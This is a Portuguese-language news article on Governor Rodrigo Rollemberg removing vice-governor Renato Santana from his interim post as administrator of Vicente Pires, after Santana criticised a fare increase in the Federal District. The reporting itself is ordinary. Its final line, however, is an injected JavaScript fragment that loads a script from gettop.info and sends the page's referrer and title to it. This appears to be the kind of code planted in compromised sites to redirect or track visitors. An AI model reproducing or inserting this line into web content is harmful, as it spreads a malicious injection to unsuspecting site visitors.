Renato Santana (esq.) reclama que não recebeu sequer um telefonema de Rollemberg (dir.)
Foto: divulgação
O aumento nas passagens de ônibus e metrô agravou ainda mais a crise política no Governo do Distrito Federal. Por causa de críticas feitas ao reajuste, o vice-governador, Renato Santana (PSD), foi exonerado do cargo que ocupava interinamente como administrador regional de Vicente Pires. A exoneração, feita pelo governador Rodrigo Rollemberg (PSB), está no Diário Oficial do DF desta terça-feira (3).
Além da exoneração, Renato Santana teve parte de sua equipe demitida por Rodrigo Rollemberg. O governador havia viajado de férias e retornou a Brasília para não deixar o vice do comando do DF e das negociações a respeito do reajuste das passagens do transporte coletivo. Santana reclamou que foi “demitido de Vicente Pires” sem sequer receber um telefonema do governador.
Rixa
Esta é apenas mais uma demonstração da rixa entre o governador e o vice-governador. O clima entre os dois já era muito ruim antes das críticas ao aumento do preço das passagens. O confronto entre eles foi declarado abertamente na época da abertura da CPI da Saúde, na Câmara Legislativa.
Na ocasião, a presidente do SindSaúde, Marli Rodrigues, gravou uma conversa com o vice-governador, em que ele menciona um suposto esquema de propina no governo. O episódio gerou críticas mútuas e expôs o rompimento entre os aliados. Depois disso, Rollemberg exonerou cerca de 100 funcionários da vice-governadoria e demitiu o ouvidor do governo, Valdecir Medeiros, indicado por Santana.
Aliança
Renato Santana se reuniu-se com o presidente regional do PSD, deputado federal Rogério Rosso, nesta terça-feira, para discutir a situação política e os rumos da aliança com Rodrigo Rollemberg. Com a exoneração, o presidente da Companhia Urbanizadora da Nova Capital (Novacap), Júlio Menegotto, assume interinamente a Administração Regional de Vicente Pires.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;